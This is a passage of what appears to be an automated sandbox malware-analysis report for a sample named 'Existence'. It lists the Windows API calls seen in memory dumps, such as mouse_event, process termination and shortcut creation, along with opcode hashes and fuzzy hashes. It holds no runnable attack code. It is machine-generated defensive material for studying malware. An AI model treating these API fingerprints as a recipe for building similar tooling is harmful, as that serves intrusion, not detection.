                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 642888154-0
                                                                                                                                                                                          • Opcode ID: 5a3b6fc1bc080ce5ca7ad26f7abbf3c1f11d60ebd0a55a03a6499a044d16da57
                                                                                                                                                                                          • Instruction ID: 611c421a6b80a0c0295c4bd9b5010150d42f4edbef5af94bfd292b93da56d937
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a3b6fc1bc080ce5ca7ad26f7abbf3c1f11d60ebd0a55a03a6499a044d16da57
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E41C130602644AFDBB5CF24D889FA17BF0FB49304F1840ADE5094B2B2CB79AC45CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(?,?,00000000), ref: 007B2D45
                                                                                                                                                                                            • Part of subcall function 007AEF33: GetWindowRect.USER32(?,?), ref: 007AEF4B
                                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 007B2D6F
                                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 007B2D76
                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 007B2DB2
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 007B2DDE
                                                                                                                                                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 007B2E3C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2387181109-0
                                                                                                                                                                                          • Opcode ID: 9b34ac6ba4d9c5bdb0051c8b1a09baf8c3660295a6ac2baef948997cd628a3be
                                                                                                                                                                                          • Instruction ID: b07b68a252d573e31d36c4bbbd86a1f80f00c2d52c6d55ba1d5d2f5edf05fbb5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b34ac6ba4d9c5bdb0051c8b1a09baf8c3660295a6ac2baef948997cd628a3be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7031D272605315ABC720DF14D849F9BB7A9FB88354F00052DF495A7191DA38E905CBD1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 007955F9
                                                                                                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00795616
                                                                                                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079564E
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 0079566C
                                                                                                                                                                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00795674
                                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 0079567E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 72514467-0
                                                                                                                                                                                          • Opcode ID: 60d3a4874f0b7536c93dbb3bda3d247453021ec2b1e60fbe186a6c3557c27fb8
                                                                                                                                                                                          • Instruction ID: da51df0171c0f664da83023af491c31e95b722392bb1210a220f9e28c7c2c123
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60d3a4874f0b7536c93dbb3bda3d247453021ec2b1e60fbe186a6c3557c27fb8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 78212632204A14BBEF265B35AC49E7F7BA8DF45B50F14803DFC05CA091EAB8DC4187A1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00735851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007355D1,?,?,00774B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00735871
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007A62C0
                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 007A63DA
                                                                                                                                                                                          • CoCreateInstance.OLE32(007D0CC4,00000000,00000001,007D0B34,?), ref: 007A63F3
                                                                                                                                                                                          • CoUninitialize.OLE32 ref: 007A6411
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                          • String ID: .lnk
                                                                                                                                                                                          • API String ID: 3172280962-24824748
                                                                                                                                                                                          • Opcode ID: d198c37f808281bd513454e27c04a994e81e8b9a005eb1699c750bba685f5c0e
                                                                                                                                                                                          • Instruction ID: f931579f91fd65c528de68748ffa816fcbab4aac6d13b59ef0ffd0adaea1a8b3
                                                                                                                                                                                          • Opcode Fuzzy Hash: d198c37f808281bd513454e27c04a994e81e8b9a005eb1699c750bba685f5c0e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 39D12275A042019FCB14DF24C484A2ABBE5EF8A714F188959F8859B362CB39ED45CB92
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 007C8740
                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,?), ref: 007C8765
                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 007C877D
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007C87A6
                                                                                                                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,007AC1F2,00000000), ref: 007C87C6
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 007C87B1
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2294984445-0
                                                                                                                                                                                          • Opcode ID: 0680c16eae702568696e6259042be0905d4f129fb234d5c248db61ea17bbfed8
                                                                                                                                                                                          • Instruction ID: f1c22f409abb6c6b865db7b8c4eb1cd760cb8767e6f8312608fae0ebe0b647dd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0680c16eae702568696e6259042be0905d4f129fb234d5c248db61ea17bbfed8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 10215E71610241AFCB649FB8CC48F6A3BA5FB45365F35863DF926D21E0EA788850CB11
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,007536E9,00753355), ref: 00753700
                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0075370E
                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00753727
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,007536E9,00753355), ref: 00753779
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                          • Opcode ID: 0a0adaef601c0556cfa0e6b32eead7b6bcd380db8e0a6c4e25aa690ac2e6ec17
                                                                                                                                                                                          • Instruction ID: 0bb271ea29849b46a24b7311556c31db371f6b88a33f474714db78a9b6abfbd0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a0adaef601c0556cfa0e6b32eead7b6bcd380db8e0a6c4e25aa690ac2e6ec17
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E01F9B2909711AEA63517746CC99EA2795D7097F7720462DF810410F0EFDD4D0AA148
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00754D53,00000000,?,?,007568E2,?,?,00000000), ref: 007630EB
                                                                                                                                                                                          • _free.LIBCMT ref: 0076311E
                                                                                                                                                                                          • _free.LIBCMT ref: 00763146
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 00763153
                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000), ref: 0076315F
                                                                                                                                                                                          • _abort.LIBCMT ref: 00763165
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3160817290-0
                                                                                                                                                                                          • Opcode ID: 6ac709ab9fc6eefe4ba2b9477f2b552e45f75baf5b3522f8e56b38e1f08a9889
                                                                                                                                                                                          • Instruction ID: 0fdfb8df084849c31e8a85d65b8f0780ced329aa233d9323b90ecc9276063ea9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6ac709ab9fc6eefe4ba2b9477f2b552e45f75baf5b3522f8e56b38e1f08a9889
                                                                                                                                                                                          • Instruction Fuzzy Hash: E0F02D75604D08E6C2262738EC0EE5E135A9FC3770B264029FD27D22D2EF2C8E03C165
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00731F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00731F87
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731F96
                                                                                                                                                                                            • Part of subcall function 00731F2D: BeginPath.GDI32(?), ref: 00731FAD
                                                                                                                                                                                            • Part of subcall function 00731F2D: SelectObject.GDI32(?,00000000), ref: 00731FD6
                                                                                                                                                                                          • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 007C94AA
                                                                                                                                                                                          • LineTo.GDI32(?,00000003,00000000), ref: 007C94BE
                                                                                                                                                                                          • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 007C94CC
                                                                                                                                                                                          • LineTo.GDI32(?,00000000,00000003), ref: 007C94DC
                                                                                                                                                                                          • EndPath.GDI32(?), ref: 007C94EC
                                                                                                                                                                                          • StrokePath.GDI32(?), ref: 007C94FC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 43455801-0
                                                                                                                                                                                          • Opcode ID: 802fd96c229691c41848e9ef9a6e7874fcb0abba1ee44c47da5bb7c72ae58c52
                                                                                                                                                                                          • Instruction ID: 01f3c45b4a0ffd57eda6e43e98bb1c595b465245f730acada08b80f780df4961
                                                                                                                                                                                          • Opcode Fuzzy Hash: 802fd96c229691c41848e9ef9a6e7874fcb0abba1ee44c47da5bb7c72ae58c52
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E111B7600014DBFEF129F94DC88E9A7F6DEF08360F04C029BA194A1A1D7759E95DBA4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00795B7C
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00795B8D
                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00795B94
                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00795B9C
                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00795BB3
                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00795BC5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                          • Opcode ID: 03f450c518a3ecedcab993afec67a747260dd07b4aaf9776511096f4f722ec77
                                                                                                                                                                                          • Instruction ID: 0daf311435c6c629c3f501ad5e1e139e6125064b9b4d7043e901cb4a6238052c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03f450c518a3ecedcab993afec67a747260dd07b4aaf9776511096f4f722ec77
                                                                                                                                                                                          • Instruction Fuzzy Hash: 780144B5A00718BBEF119BE99C49F4EBF78EB44751F048069FA05A7280D6749C01CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007332AF
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 007332B7
                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007332C2
                                                                                                                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007332CD
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 007332D5
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 007332DD
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4278518827-0
                                                                                                                                                                                          • Opcode ID: 1dd98167c27e27a39d64a3ab0498883250d3e95d2e9dc08ef0e9dc5fa649ff99
                                                                                                                                                                                          • Instruction ID: a30a5a0c62fea9a5b175e8460b56fd164fe46796c6cd1751effc2d51f9ba5c25
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dd98167c27e27a39d64a3ab0498883250d3e95d2e9dc08ef0e9dc5fa649ff99
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D016CB09017597DE3008F5A8C85B52FFA8FF19354F00415B915C47941C7F5AC64CBE5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0079F447
                                                                                                                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0079F45D
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0079F46C
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F47B
                                                                                                                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F485
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0079F48C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 839392675-0
                                                                                                                                                                                          • Opcode ID: cb6f29cd2412d41f35f19e2ef778d358bbec1434854449163aee0fb2d32100aa
                                                                                                                                                                                          • Instruction ID: d72128a58d6d31ef6be956433495d4f36dba1c9b0a6fce433e23b85659ccda33
                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6f29cd2412d41f35f19e2ef778d358bbec1434854449163aee0fb2d32100aa
                                                                                                                                                                                          • Instruction Fuzzy Hash: BEF01D72241558BBE73157929C0EEEB7B7CEBC6B51F04406CF601A119096A85E42C6B9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetClientRect.USER32(?), ref: 007734EF
                                                                                                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00773506
                                                                                                                                                                                          • GetWindowDC.USER32(?), ref: 00773512
                                                                                                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00773521
                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00773533
                                                                                                                                                                                          • GetSysColor.USER32(00000005), ref: 0077354D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 272304278-0
                                                                                                                                                                                          • Opcode ID: e0afb57cf9721bcbe283286ec6bd96fa9498638083ec0c566c166eb4e8055d60
                                                                                                                                                                                          • Instruction ID: d2b4672c85ec748644bff49a867214f4871d5f3f88386145aa80ab640f1c7369
                                                                                                                                                                                          • Opcode Fuzzy Hash: e0afb57cf9721bcbe283286ec6bd96fa9498638083ec0c566c166eb4e8055d60
                                                                                                                                                                                          • Instruction Fuzzy Hash: A3014B31500105EFEB605FA4DC08FE97BB1FB04361F518178F91AA21A1CB391E62EF10
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 007921CC
                                                                                                                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 007921D8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007921E1
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 007921E9
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007921F2
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007921F9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
